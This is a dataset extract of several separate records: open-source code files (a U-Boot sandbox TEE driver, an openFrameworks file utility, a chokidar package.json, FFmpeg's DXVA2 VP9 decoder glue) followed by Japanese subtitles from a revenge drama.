text
stringlengths 2
100k
| meta
dict |
---|---|
TypeError: The global property undefined is not configurable, writable, nor enumerable, therefore cannot be declared as a function
at Global code (CanDeclareGlobalFunctionNonEval.js:1:1)
| {
"pile_set_name": "Github"
} |
// SPDX-License-Identifier: GPL-2.0+
/*
* Copyright (C) 2018 Linaro Limited
*/
#include <common.h>
#include <dm.h>
#include <sandboxtee.h>
#include <tee.h>
#include <tee/optee_ta_avb.h>
/*
* The sandbox tee driver tries to emulate a generic Trusted Exectution
* Environment (TEE) with the Trusted Application (TA) OPTEE_TA_AVB
* available.
*/
/**
* struct ta_entry - TA entries
* @uuid: UUID of an emulated TA
* @open_session Called when a session is openened to the TA
* @invoke_func Called when a function in the TA is to be invoked
*
* This struct is used to register TAs in this sandbox emulation of a TEE.
*/
struct ta_entry {
struct tee_optee_ta_uuid uuid;
u32 (*open_session)(uint num_params, struct tee_param *params);
u32 (*invoke_func)(u32 func, uint num_params, struct tee_param *params);
};
#ifdef CONFIG_OPTEE_TA_AVB
static u32 get_attr(uint n, uint num_params, struct tee_param *params)
{
if (n >= num_params)
return TEE_PARAM_ATTR_TYPE_NONE;
return params[n].attr;
}
static u32 check_params(u8 p0, u8 p1, u8 p2, u8 p3, uint num_params,
struct tee_param *params)
{
u8 p[] = { p0, p1, p2, p3};
uint n;
for (n = 0; n < ARRAY_SIZE(p); n++)
if (p[n] != get_attr(n, num_params, params))
goto bad_params;
for (; n < num_params; n++)
if (get_attr(n, num_params, params))
goto bad_params;
return TEE_SUCCESS;
bad_params:
printf("Bad param attrs\n");
return TEE_ERROR_BAD_PARAMETERS;
}
static u64 ta_avb_rollback_indexes[TA_AVB_MAX_ROLLBACK_LOCATIONS];
static u32 ta_avb_lock_state;
static u32 ta_avb_open_session(uint num_params, struct tee_param *params)
{
/*
* We don't expect additional parameters when opening a session to
* this TA.
*/
return check_params(TEE_PARAM_ATTR_TYPE_NONE, TEE_PARAM_ATTR_TYPE_NONE,
TEE_PARAM_ATTR_TYPE_NONE, TEE_PARAM_ATTR_TYPE_NONE,
num_params, params);
}
static u32 ta_avb_invoke_func(u32 func, uint num_params,
struct tee_param *params)
{
u32 res;
uint slot;
u64 val;
switch (func) {
case TA_AVB_CMD_READ_ROLLBACK_INDEX:
res = check_params(TEE_PARAM_ATTR_TYPE_VALUE_INPUT,
TEE_PARAM_ATTR_TYPE_VALUE_OUTPUT,
TEE_PARAM_ATTR_TYPE_NONE,
TEE_PARAM_ATTR_TYPE_NONE,
num_params, params);
if (res)
return res;
slot = params[0].u.value.a;
if (slot >= ARRAY_SIZE(ta_avb_rollback_indexes)) {
printf("Rollback index slot out of bounds %u\n", slot);
return TEE_ERROR_BAD_PARAMETERS;
}
val = ta_avb_rollback_indexes[slot];
params[1].u.value.a = val >> 32;
params[1].u.value.b = val;
return TEE_SUCCESS;
case TA_AVB_CMD_WRITE_ROLLBACK_INDEX:
res = check_params(TEE_PARAM_ATTR_TYPE_VALUE_INPUT,
TEE_PARAM_ATTR_TYPE_VALUE_INPUT,
TEE_PARAM_ATTR_TYPE_NONE,
TEE_PARAM_ATTR_TYPE_NONE,
num_params, params);
if (res)
return res;
slot = params[0].u.value.a;
if (slot >= ARRAY_SIZE(ta_avb_rollback_indexes)) {
printf("Rollback index slot out of bounds %u\n", slot);
return TEE_ERROR_BAD_PARAMETERS;
}
val = (u64)params[1].u.value.a << 32 | params[1].u.value.b;
if (val < ta_avb_rollback_indexes[slot])
return TEE_ERROR_SECURITY;
ta_avb_rollback_indexes[slot] = val;
return TEE_SUCCESS;
case TA_AVB_CMD_READ_LOCK_STATE:
res = check_params(TEE_PARAM_ATTR_TYPE_VALUE_OUTPUT,
TEE_PARAM_ATTR_TYPE_NONE,
TEE_PARAM_ATTR_TYPE_NONE,
TEE_PARAM_ATTR_TYPE_NONE,
num_params, params);
if (res)
return res;
params[0].u.value.a = ta_avb_lock_state;
return TEE_SUCCESS;
case TA_AVB_CMD_WRITE_LOCK_STATE:
res = check_params(TEE_PARAM_ATTR_TYPE_VALUE_INPUT,
TEE_PARAM_ATTR_TYPE_NONE,
TEE_PARAM_ATTR_TYPE_NONE,
TEE_PARAM_ATTR_TYPE_NONE,
num_params, params);
if (res)
return res;
if (ta_avb_lock_state != params[0].u.value.a) {
ta_avb_lock_state = params[0].u.value.a;
memset(ta_avb_rollback_indexes, 0,
sizeof(ta_avb_rollback_indexes));
}
return TEE_SUCCESS;
default:
return TEE_ERROR_NOT_SUPPORTED;
}
}
#endif /*OPTEE_TA_AVB*/
static const struct ta_entry ta_entries[] = {
#ifdef CONFIG_OPTEE_TA_AVB
{ .uuid = TA_AVB_UUID,
.open_session = ta_avb_open_session,
.invoke_func = ta_avb_invoke_func,
},
#endif
};
static void sandbox_tee_get_version(struct udevice *dev,
struct tee_version_data *vers)
{
struct tee_version_data v = {
.gen_caps = TEE_GEN_CAP_GP | TEE_GEN_CAP_REG_MEM,
};
*vers = v;
}
static int sandbox_tee_close_session(struct udevice *dev, u32 session)
{
struct sandbox_tee_state *state = dev_get_priv(dev);
if (!state->ta || state->session != session)
return -EINVAL;
state->session = 0;
state->ta = NULL;
return 0;
}
static const struct ta_entry *find_ta_entry(u8 uuid[TEE_UUID_LEN])
{
struct tee_optee_ta_uuid u;
uint n;
tee_optee_ta_uuid_from_octets(&u, uuid);
for (n = 0; n < ARRAY_SIZE(ta_entries); n++)
if (!memcmp(&u, &ta_entries[n].uuid, sizeof(u)))
return ta_entries + n;
return NULL;
}
static int sandbox_tee_open_session(struct udevice *dev,
struct tee_open_session_arg *arg,
uint num_params, struct tee_param *params)
{
struct sandbox_tee_state *state = dev_get_priv(dev);
const struct ta_entry *ta;
if (state->ta) {
printf("A session is already open\n");
return -EBUSY;
}
ta = find_ta_entry(arg->uuid);
if (!ta) {
printf("Cannot find TA\n");
arg->ret = TEE_ERROR_ITEM_NOT_FOUND;
arg->ret_origin = TEE_ORIGIN_TEE;
return 0;
}
arg->ret = ta->open_session(num_params, params);
arg->ret_origin = TEE_ORIGIN_TRUSTED_APP;
if (!arg->ret) {
state->ta = (void *)ta;
state->session = 1;
arg->session = state->session;
} else {
printf("Cannot open session, TA returns error\n");
}
return 0;
}
static int sandbox_tee_invoke_func(struct udevice *dev,
struct tee_invoke_arg *arg,
uint num_params, struct tee_param *params)
{
struct sandbox_tee_state *state = dev_get_priv(dev);
struct ta_entry *ta = state->ta;
if (!arg->session) {
printf("Missing session\n");
return -EINVAL;
}
if (!ta) {
printf("TA session not available\n");
return -EINVAL;
}
if (arg->session != state->session) {
printf("Session mismatch\n");
return -EINVAL;
}
arg->ret = ta->invoke_func(arg->func, num_params, params);
arg->ret_origin = TEE_ORIGIN_TRUSTED_APP;
return 0;
}
static int sandbox_tee_shm_register(struct udevice *dev, struct tee_shm *shm)
{
struct sandbox_tee_state *state = dev_get_priv(dev);
state->num_shms++;
return 0;
}
static int sandbox_tee_shm_unregister(struct udevice *dev, struct tee_shm *shm)
{
struct sandbox_tee_state *state = dev_get_priv(dev);
state->num_shms--;
return 0;
}
static const struct tee_driver_ops sandbox_tee_ops = {
.get_version = sandbox_tee_get_version,
.open_session = sandbox_tee_open_session,
.close_session = sandbox_tee_close_session,
.invoke_func = sandbox_tee_invoke_func,
.shm_register = sandbox_tee_shm_register,
.shm_unregister = sandbox_tee_shm_unregister,
};
static const struct udevice_id sandbox_tee_match[] = {
{ .compatible = "sandbox,tee" },
{},
};
U_BOOT_DRIVER(sandbox_tee) = {
.name = "sandbox_tee",
.id = UCLASS_TEE,
.of_match = sandbox_tee_match,
.ops = &sandbox_tee_ops,
.priv_auto_alloc_size = sizeof(struct sandbox_tee_state),
};
| {
"pile_set_name": "Github"
} |
//
// FileUtils.h
// ParticleMaker
//
// Created by Andreas Müller on 04/03/2014.
//
//
#pragma once
class FileUtils
{
public:
// ---------------------------------------------------------------------------------------------------------------------------------------------------
//
static vector<string> getFilePathsInFolder( string _folder, string _extension )
{
vector<string> tmpExt;
tmpExt.push_back( _extension );
return getFilePathsInFolder( _folder, tmpExt );
}
// ---------------------------------------------------------------------------------------------------------------------------------------------------
//
static vector<string> getFilePathsInFolder( string _folder, vector<string> _extensions )
{
vector<string> filePaths;
ofDirectory tmpDir( _folder );
for( unsigned int i = 0; i < _extensions.size(); i++ )
{
tmpDir.allowExt( _extensions.at(i) );
}
int numFiles = tmpDir.listDir( _folder );
for( int i = 0; i < numFiles; i++ )
{
filePaths.push_back( tmpDir.getPath(i) );
}
return filePaths;
}
// ---------------------------------------------------------------------------------------------------------------------------------------------------
//
static string getFirstFileOfTypeInFolder( string _folder, string _extension )
{
vector<string> tmpFiles = getFilePathsInFolder( _folder, _extension );
if( tmpFiles.size() > 0 )
{
return tmpFiles.at(0);
}
return "";
}
// ---------------------------------------------------------------------------------------------------------------------------------------------------
//
static vector<string> getImageFilePathsInFolder( string _folder )
{
vector<string> tmpExt;
tmpExt.push_back( "png" );
tmpExt.push_back( "bmp" );
tmpExt.push_back( "jpg" );
tmpExt.push_back( "tga" );
return getFilePathsInFolder( _folder, tmpExt );
}
// ---------------------------------------------------------------------------------------------------------------------------------------------------
//
static void loadImagesInFolder( string _folder, string _extension, vector<ofImage*>& _images )
{
vector<string> tmpExt;
tmpExt.push_back( _extension );
return loadImagesInFolder( _folder, tmpExt, _images );
}
// ---------------------------------------------------------------------------------------------------------------------------------------------------
//
static void loadImagesInFolder( string _folder, vector<string> _extensions, vector<ofImage*>& _images )
{
vector<string> textureFilePaths = FileUtils::getFilePathsInFolder( _folder, _extensions );
for( unsigned int i = 0; i < textureFilePaths.size(); i++ )
{
ofImage* tmpIm = new ofImage();
tmpIm->loadImage( textureFilePaths.at(i) );
_images.push_back( tmpIm );
}
}
};
| {
"pile_set_name": "Github"
} |
{
"_from": "chokidar@^1.7.0",
"_id": "[email protected]",
"_inBundle": false,
"_integrity": "sha1-eY5ol3gVHIB2tLNg5e3SjNortGg=",
"_location": "/chokidar",
"_phantomChildren": {},
"_requested": {
"type": "range",
"registry": true,
"raw": "chokidar@^1.7.0",
"name": "chokidar",
"escapedName": "chokidar",
"rawSpec": "^1.7.0",
"saveSpec": null,
"fetchSpec": "^1.7.0"
},
"_requiredBy": [
"/watchpack"
],
"_resolved": "https://registry.npmjs.org/chokidar/-/chokidar-1.7.0.tgz",
"_shasum": "798e689778151c8076b4b360e5edd28cda2bb468",
"_spec": "chokidar@^1.7.0",
"_where": "/Users/disk0nn3ct/Documents/empire-gui/node_modules/watchpack",
"author": {
"name": "Paul Miller",
"url": "http://paulmillr.com"
},
"bugs": {
"url": "http://github.com/paulmillr/chokidar/issues"
},
"bundleDependencies": false,
"dependencies": {
"anymatch": "^1.3.0",
"async-each": "^1.0.0",
"fsevents": "^1.0.0",
"glob-parent": "^2.0.0",
"inherits": "^2.0.1",
"is-binary-path": "^1.0.0",
"is-glob": "^2.0.0",
"path-is-absolute": "^1.0.0",
"readdirp": "^2.0.0"
},
"deprecated": false,
"description": "A neat wrapper around node.js fs.watch / fs.watchFile / fsevents.",
"devDependencies": {
"chai": "^3.2.0",
"coveralls": "^2.11.2",
"graceful-fs": "4.1.4",
"istanbul": "^0.3.20",
"mocha": "^3.0.0",
"rimraf": "^2.4.3",
"sinon": "^1.10.3",
"sinon-chai": "^2.6.0"
},
"files": [
"index.js",
"lib/"
],
"homepage": "https://github.com/paulmillr/chokidar",
"keywords": [
"fs",
"watch",
"watchFile",
"watcher",
"watching",
"file",
"fsevents"
],
"license": "MIT",
"name": "chokidar",
"optionalDependencies": {
"fsevents": "^1.0.0"
},
"repository": {
"type": "git",
"url": "git+https://github.com/paulmillr/chokidar.git"
},
"scripts": {
"ci-test": "istanbul cover _mocha && cat ./coverage/lcov.info | coveralls",
"test": "istanbul test node_modules/mocha/bin/_mocha"
},
"version": "1.7.0"
}
| {
"pile_set_name": "Github"
} |
/*
* DXVA2 VP9 HW acceleration.
*
* copyright (c) 2015 Hendrik Leppkes
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/avassert.h"
#include "libavutil/pixdesc.h"
#include "dxva2_internal.h"
#include "vp9shared.h"
struct vp9_dxva2_picture_context {
DXVA_PicParams_VP9 pp;
DXVA_Slice_VPx_Short slice;
const uint8_t *bitstream;
unsigned bitstream_size;
};
static void fill_picture_entry(DXVA_PicEntry_VPx *pic,
unsigned index, unsigned flag)
{
av_assert0((index & 0x7f) == index && (flag & 0x01) == flag);
pic->bPicEntry = index | (flag << 7);
}
static int fill_picture_parameters(const AVCodecContext *avctx, AVDXVAContext *ctx, const VP9SharedContext *h,
DXVA_PicParams_VP9 *pp)
{
int i;
const AVPixFmtDescriptor * pixdesc = av_pix_fmt_desc_get(avctx->sw_pix_fmt);
if (!pixdesc)
return -1;
memset(pp, 0, sizeof(*pp));
fill_picture_entry(&pp->CurrPic, ff_dxva2_get_surface_index(avctx, ctx, h->frames[CUR_FRAME].tf.f), 0);
pp->profile = h->h.profile;
pp->wFormatAndPictureInfoFlags = ((h->h.keyframe == 0) << 0) |
((h->h.invisible == 0) << 1) |
(h->h.errorres << 2) |
(pixdesc->log2_chroma_w << 3) | /* subsampling_x */
(pixdesc->log2_chroma_h << 4) | /* subsampling_y */
(0 << 5) | /* extra_plane */
(h->h.refreshctx << 6) |
(h->h.parallelmode << 7) |
(h->h.intraonly << 8) |
(h->h.framectxid << 9) |
(h->h.resetctx << 11) |
((h->h.keyframe ? 0 : h->h.highprecisionmvs) << 13) |
(0 << 14); /* ReservedFormatInfo2Bits */
pp->width = avctx->width;
pp->height = avctx->height;
pp->BitDepthMinus8Luma = pixdesc->comp[0].depth - 8;
pp->BitDepthMinus8Chroma = pixdesc->comp[1].depth - 8;
/* swap 0/1 to match the reference */
pp->interp_filter = h->h.filtermode ^ (h->h.filtermode <= 1);
pp->Reserved8Bits = 0;
for (i = 0; i < 8; i++) {
if (h->refs[i].f->buf[0]) {
fill_picture_entry(&pp->ref_frame_map[i], ff_dxva2_get_surface_index(avctx, ctx, h->refs[i].f), 0);
pp->ref_frame_coded_width[i] = h->refs[i].f->width;
pp->ref_frame_coded_height[i] = h->refs[i].f->height;
} else
pp->ref_frame_map[i].bPicEntry = 0xFF;
}
for (i = 0; i < 3; i++) {
uint8_t refidx = h->h.refidx[i];
if (h->refs[refidx].f->buf[0])
fill_picture_entry(&pp->frame_refs[i], ff_dxva2_get_surface_index(avctx, ctx, h->refs[refidx].f), 0);
else
pp->frame_refs[i].bPicEntry = 0xFF;
pp->ref_frame_sign_bias[i + 1] = h->h.signbias[i];
}
pp->filter_level = h->h.filter.level;
pp->sharpness_level = h->h.filter.sharpness;
pp->wControlInfoFlags = (h->h.lf_delta.enabled << 0) |
(h->h.lf_delta.updated << 1) |
(h->h.use_last_frame_mvs << 2) |
(0 << 3); /* ReservedControlInfo5Bits */
for (i = 0; i < 4; i++)
pp->ref_deltas[i] = h->h.lf_delta.ref[i];
for (i = 0; i < 2; i++)
pp->mode_deltas[i] = h->h.lf_delta.mode[i];
pp->base_qindex = h->h.yac_qi;
pp->y_dc_delta_q = h->h.ydc_qdelta;
pp->uv_dc_delta_q = h->h.uvdc_qdelta;
pp->uv_ac_delta_q = h->h.uvac_qdelta;
/* segmentation data */
pp->stVP9Segments.wSegmentInfoFlags = (h->h.segmentation.enabled << 0) |
(h->h.segmentation.update_map << 1) |
(h->h.segmentation.temporal << 2) |
(h->h.segmentation.absolute_vals << 3) |
(0 << 4); /* ReservedSegmentFlags4Bits */
for (i = 0; i < 7; i++)
pp->stVP9Segments.tree_probs[i] = h->h.segmentation.prob[i];
if (h->h.segmentation.temporal)
for (i = 0; i < 3; i++)
pp->stVP9Segments.pred_probs[i] = h->h.segmentation.pred_prob[i];
else
memset(pp->stVP9Segments.pred_probs, 255, sizeof(pp->stVP9Segments.pred_probs));
for (i = 0; i < 8; i++) {
pp->stVP9Segments.feature_mask[i] = (h->h.segmentation.feat[i].q_enabled << 0) |
(h->h.segmentation.feat[i].lf_enabled << 1) |
(h->h.segmentation.feat[i].ref_enabled << 2) |
(h->h.segmentation.feat[i].skip_enabled << 3);
pp->stVP9Segments.feature_data[i][0] = h->h.segmentation.feat[i].q_val;
pp->stVP9Segments.feature_data[i][1] = h->h.segmentation.feat[i].lf_val;
pp->stVP9Segments.feature_data[i][2] = h->h.segmentation.feat[i].ref_val;
pp->stVP9Segments.feature_data[i][3] = 0; /* no data for skip */
}
pp->log2_tile_cols = h->h.tiling.log2_tile_cols;
pp->log2_tile_rows = h->h.tiling.log2_tile_rows;
pp->uncompressed_header_size_byte_aligned = h->h.uncompressed_header_size;
pp->first_partition_size = h->h.compressed_header_size;
pp->StatusReportFeedbackNumber = 1 + DXVA_CONTEXT_REPORT_ID(avctx, ctx)++;
return 0;
}
static void fill_slice_short(DXVA_Slice_VPx_Short *slice,
unsigned position, unsigned size)
{
memset(slice, 0, sizeof(*slice));
slice->BSNALunitDataLocation = position;
slice->SliceBytesInBuffer = size;
slice->wBadSliceChopping = 0;
}
static int commit_bitstream_and_slice_buffer(AVCodecContext *avctx,
DECODER_BUFFER_DESC *bs,
DECODER_BUFFER_DESC *sc)
{
const VP9SharedContext *h = avctx->priv_data;
AVDXVAContext *ctx = DXVA_CONTEXT(avctx);
struct vp9_dxva2_picture_context *ctx_pic = h->frames[CUR_FRAME].hwaccel_picture_private;
void *dxva_data_ptr;
uint8_t *dxva_data;
unsigned dxva_size;
unsigned padding;
unsigned type;
#if CONFIG_D3D11VA
if (ff_dxva2_is_d3d11(avctx)) {
type = D3D11_VIDEO_DECODER_BUFFER_BITSTREAM;
if (FAILED(ID3D11VideoContext_GetDecoderBuffer(D3D11VA_CONTEXT(ctx)->video_context,
D3D11VA_CONTEXT(ctx)->decoder,
type,
&dxva_size, &dxva_data_ptr)))
return -1;
}
#endif
#if CONFIG_DXVA2
if (avctx->pix_fmt == AV_PIX_FMT_DXVA2_VLD) {
type = DXVA2_BitStreamDateBufferType;
if (FAILED(IDirectXVideoDecoder_GetBuffer(DXVA2_CONTEXT(ctx)->decoder,
type,
&dxva_data_ptr, &dxva_size)))
return -1;
}
#endif
dxva_data = dxva_data_ptr;
if (ctx_pic->slice.SliceBytesInBuffer > dxva_size) {
av_log(avctx, AV_LOG_ERROR, "Failed to build bitstream");
return -1;
}
memcpy(dxva_data, ctx_pic->bitstream, ctx_pic->slice.SliceBytesInBuffer);
padding = FFMIN(128 - ((ctx_pic->slice.SliceBytesInBuffer) & 127), dxva_size - ctx_pic->slice.SliceBytesInBuffer);
if (padding > 0) {
memset(dxva_data + ctx_pic->slice.SliceBytesInBuffer, 0, padding);
ctx_pic->slice.SliceBytesInBuffer += padding;
}
#if CONFIG_D3D11VA
if (ff_dxva2_is_d3d11(avctx))
if (FAILED(ID3D11VideoContext_ReleaseDecoderBuffer(D3D11VA_CONTEXT(ctx)->video_context, D3D11VA_CONTEXT(ctx)->decoder, type)))
return -1;
#endif
#if CONFIG_DXVA2
if (avctx->pix_fmt == AV_PIX_FMT_DXVA2_VLD)
if (FAILED(IDirectXVideoDecoder_ReleaseBuffer(DXVA2_CONTEXT(ctx)->decoder, type)))
return -1;
#endif
#if CONFIG_D3D11VA
if (ff_dxva2_is_d3d11(avctx)) {
D3D11_VIDEO_DECODER_BUFFER_DESC *dsc11 = bs;
memset(dsc11, 0, sizeof(*dsc11));
dsc11->BufferType = type;
dsc11->DataSize = ctx_pic->slice.SliceBytesInBuffer;
dsc11->NumMBsInBuffer = 0;
type = D3D11_VIDEO_DECODER_BUFFER_SLICE_CONTROL;
}
#endif
#if CONFIG_DXVA2
if (avctx->pix_fmt == AV_PIX_FMT_DXVA2_VLD) {
DXVA2_DecodeBufferDesc *dsc2 = bs;
memset(dsc2, 0, sizeof(*dsc2));
dsc2->CompressedBufferType = type;
dsc2->DataSize = ctx_pic->slice.SliceBytesInBuffer;
dsc2->NumMBsInBuffer = 0;
type = DXVA2_SliceControlBufferType;
}
#endif
return ff_dxva2_commit_buffer(avctx, ctx, sc,
type,
&ctx_pic->slice, sizeof(ctx_pic->slice), 0);
}
static int dxva2_vp9_start_frame(AVCodecContext *avctx,
av_unused const uint8_t *buffer,
av_unused uint32_t size)
{
const VP9SharedContext *h = avctx->priv_data;
AVDXVAContext *ctx = DXVA_CONTEXT(avctx);
struct vp9_dxva2_picture_context *ctx_pic = h->frames[CUR_FRAME].hwaccel_picture_private;
if (!DXVA_CONTEXT_VALID(avctx, ctx))
return -1;
av_assert0(ctx_pic);
/* Fill up DXVA_PicParams_VP9 */
if (fill_picture_parameters(avctx, ctx, h, &ctx_pic->pp) < 0)
return -1;
ctx_pic->bitstream_size = 0;
ctx_pic->bitstream = NULL;
return 0;
}
static int dxva2_vp9_decode_slice(AVCodecContext *avctx,
const uint8_t *buffer,
uint32_t size)
{
const VP9SharedContext *h = avctx->priv_data;
struct vp9_dxva2_picture_context *ctx_pic = h->frames[CUR_FRAME].hwaccel_picture_private;
unsigned position;
if (!ctx_pic->bitstream)
ctx_pic->bitstream = buffer;
ctx_pic->bitstream_size += size;
position = buffer - ctx_pic->bitstream;
fill_slice_short(&ctx_pic->slice, position, size);
return 0;
}
static int dxva2_vp9_end_frame(AVCodecContext *avctx)
{
VP9SharedContext *h = avctx->priv_data;
struct vp9_dxva2_picture_context *ctx_pic = h->frames[CUR_FRAME].hwaccel_picture_private;
int ret;
if (ctx_pic->bitstream_size <= 0)
return -1;
ret = ff_dxva2_common_end_frame(avctx, h->frames[CUR_FRAME].tf.f,
&ctx_pic->pp, sizeof(ctx_pic->pp),
NULL, 0,
commit_bitstream_and_slice_buffer);
return ret;
}
#if CONFIG_VP9_DXVA2_HWACCEL
const AVHWAccel ff_vp9_dxva2_hwaccel = {
.name = "vp9_dxva2",
.type = AVMEDIA_TYPE_VIDEO,
.id = AV_CODEC_ID_VP9,
.pix_fmt = AV_PIX_FMT_DXVA2_VLD,
.init = ff_dxva2_decode_init,
.uninit = ff_dxva2_decode_uninit,
.start_frame = dxva2_vp9_start_frame,
.decode_slice = dxva2_vp9_decode_slice,
.end_frame = dxva2_vp9_end_frame,
.frame_params = ff_dxva2_common_frame_params,
.frame_priv_data_size = sizeof(struct vp9_dxva2_picture_context),
.priv_data_size = sizeof(FFDXVASharedContext),
};
#endif
#if CONFIG_VP9_D3D11VA_HWACCEL
const AVHWAccel ff_vp9_d3d11va_hwaccel = {
.name = "vp9_d3d11va",
.type = AVMEDIA_TYPE_VIDEO,
.id = AV_CODEC_ID_VP9,
.pix_fmt = AV_PIX_FMT_D3D11VA_VLD,
.init = ff_dxva2_decode_init,
.uninit = ff_dxva2_decode_uninit,
.start_frame = dxva2_vp9_start_frame,
.decode_slice = dxva2_vp9_decode_slice,
.end_frame = dxva2_vp9_end_frame,
.frame_params = ff_dxva2_common_frame_params,
.frame_priv_data_size = sizeof(struct vp9_dxva2_picture_context),
.priv_data_size = sizeof(FFDXVASharedContext),
};
#endif
#if CONFIG_VP9_D3D11VA2_HWACCEL
const AVHWAccel ff_vp9_d3d11va2_hwaccel = {
.name = "vp9_d3d11va2",
.type = AVMEDIA_TYPE_VIDEO,
.id = AV_CODEC_ID_VP9,
.pix_fmt = AV_PIX_FMT_D3D11,
.init = ff_dxva2_decode_init,
.uninit = ff_dxva2_decode_uninit,
.start_frame = dxva2_vp9_start_frame,
.decode_slice = dxva2_vp9_decode_slice,
.end_frame = dxva2_vp9_end_frame,
.frame_params = ff_dxva2_common_frame_params,
.frame_priv_data_size = sizeof(struct vp9_dxva2_picture_context),
.priv_data_size = sizeof(FFDXVASharedContext),
};
#endif
| {
"pile_set_name": "Github"
} |
1
00:00:33,545 --> 00:00:35,447
(網浜サキ)
母は5人の男に殺されたんです。
2
00:00:35,447 --> 00:00:39,218
(直美)まさか
野村先生 中川肇 本田典史➡
3
00:00:39,218 --> 00:00:41,120
それ以外に 2人いるってこと?
4
00:00:41,120 --> 00:00:42,821
警察へ行ったらどうですか?
5
00:00:42,821 --> 00:00:46,025
何の証拠もない。
だから 何の罪もない。
6
00:00:46,025 --> 00:00:48,711
証拠がないことと 罪がないことは
違う。
7
00:00:48,711 --> 00:00:52,511
(恵)あなたのスーツのジャケットから
出てきたわ。
8
00:00:56,485 --> 00:00:59,338
(須藤)うわぁ~!
9
00:00:59,338 --> 00:01:02,191
はぁ…。➡
10
00:01:02,191 --> 00:01:07,012
あぁ~~~!
11
00:01:07,012 --> 00:01:09,231
ピンポーン ピンポーン ピンポーン…(インターホンの音)
12
00:01:09,231 --> 00:01:11,333
ピンポーン ピンポーン…
13
00:01:11,333 --> 00:01:13,018
ドンドン ドンドン!
14
00:01:13,018 --> 00:01:14,987
ピンポーン ピンポーン…
15
00:01:14,987 --> 00:01:16,639
はい。
16
00:01:16,639 --> 00:01:18,791
ドンドン!ドン!
17
00:01:18,791 --> 00:01:22,127
[外:4BA6B8A62163F66E333F15509AF8BCDA] どういうつもりだ?
18
00:01:22,127 --> 00:01:25,114
[外:4BA6B8A62163F66E333F15509AF8BCDA] 何考えてんだ!?
19
00:01:25,114 --> 00:01:27,514
[外:4BA6B8A62163F66E333F15509AF8BCDA] 一体
俺が何をしたっていうんだ!?
20
00:01:30,953 --> 00:01:32,553
答えろ!!
21
00:01:34,356 --> 00:01:37,042
言ったでしょ。
22
00:01:37,042 --> 00:01:41,380
私の母は5人の男に殺されたって。
23
00:01:41,380 --> 00:01:44,950
えっ その中に…➡
24
00:01:44,950 --> 00:01:47,950
俺が入ってんのか?
25
00:01:53,976 --> 00:01:58,480
[外:4BA6B8A62163F66E333F15509AF8BCDA] いつだ? いつなんだ?
26
00:01:58,480 --> 00:02:01,500
勘違いじゃないのか?
27
00:02:01,500 --> 00:02:04,600
俺は そんな覚えはないぞ!
28
00:02:06,338 --> 00:02:10,438
そうね。 あなたはそうでしょうね。
29
00:02:13,846 --> 00:02:16,546
み~んな
忘れてるって言ったでしょ。
30
00:02:20,569 --> 00:02:23,706
やったほうは記憶にない。
31
00:02:23,706 --> 00:02:28,093
でも やられたほうは忘れない。
32
00:02:28,093 --> 00:02:29,893
決して。
33
00:02:35,918 --> 00:02:38,587
見てるわね。
34
00:02:38,587 --> 00:02:41,306
えっ?
35
00:02:41,306 --> 00:02:46,406
あなたの大事な家族が
壊れていくの。
36
00:02:49,982 --> 00:02:51,582
ふふふっ…。
37
00:02:54,920 --> 00:02:57,356
壊れる?
38
00:02:57,356 --> 00:03:01,710
ええ そう。 音を立ててね。
39
00:03:01,710 --> 00:03:05,310
[外:4BA6B8A62163F66E333F15509AF8BCDA] そんなわけないだろ!
そんなわけ…。
40
00:03:09,218 --> 00:03:14,022
(ナレーション)<人は幸せよりも
苦しみを覚えている。>
41
00:03:14,022 --> 00:03:19,495
<傷つけたことより
傷つけられたことを覚えている。>
42
00:03:19,495 --> 00:03:24,099
< きっと
彼らは覚えていないのだろう。>
43
00:03:24,099 --> 00:03:29,538
<私と会うのが
二度目だということを。>
44
00:03:29,538 --> 00:03:45,338
♬~
45
00:03:47,389 --> 00:03:50,742
(直美)新田のお母さんは
心不全で亡くなったんだよね?
46
00:03:50,742 --> 00:03:52,427
(新田隼人)はい。
47
00:03:52,427 --> 00:03:54,446
(回想 医師)
⦅救急で運ばれたときには➡
48
00:03:54,446 --> 00:03:57,483
もう 呼吸が…。➡⦆
49
00:03:57,483 --> 00:04:03,405
⦅死因は
心臓発作による急性心不全です。⦆
50
00:04:03,405 --> 00:04:09,194
もともと心臓が弱くて
街で倒れて そのまま…。
51
00:04:09,194 --> 00:04:13,148
その当時のお母さんに
変わった様子はなかった?
52
00:04:13,148 --> 00:04:17,169
なかったと思います。
そっか。
53
00:04:17,169 --> 00:04:20,289
(岩城)5人の男に殺された。➡
54
00:04:20,289 --> 00:04:26,078
そして サキさんと関わりのあった
3人が 自殺 殺人未遂。
55
00:04:26,078 --> 00:04:28,046
普通に考えれば➡
56
00:04:28,046 --> 00:04:32,017
3人は復讐のターゲットだった
ということですよね。
57
00:04:32,017 --> 00:04:38,690
(直美)う~ん… てことは
野村先生と中川肇と本田典史は➡
58
00:04:38,690 --> 00:04:42,327
新田のお母さんと接点があった
ってことだよね?
59
00:04:42,327 --> 00:04:45,831
(岩城)3人と新田のお母さんの
関係をあたってみますか。
60
00:04:45,831 --> 00:04:47,431
そうだね。
61
00:04:50,469 --> 00:04:54,590
新田も つらいと思うけど。
いえ➡
62
00:04:54,590 --> 00:04:57,893
これ以上
犠牲者を出すわけにはいきません。
63
00:04:57,893 --> 00:05:08,704
♬~
64
00:05:08,704 --> 00:05:10,304
(ドアの開閉音)
65
00:05:20,732 --> 00:05:22,532
おかえりなさい。
66
00:05:30,292 --> 00:05:32,692
はぁ~…。
67
00:05:34,980 --> 00:05:36,580
恵。
68
00:05:38,600 --> 00:05:40,900
休みを取るよ。
69
00:05:43,272 --> 00:05:44,872
えっ?
70
00:05:47,576 --> 00:05:53,576
アラスカに
オーロラを見にいこう。
71
00:05:55,817 --> 00:05:57,469
オーロラ?
72
00:05:57,469 --> 00:06:04,760
ああ。 そうだよ。
73
00:06:04,760 --> 00:06:11,984
オーロラだ。 いいだろ?
74
00:06:11,984 --> 00:06:13,735
オーロラ…。
75
00:06:13,735 --> 00:06:32,871
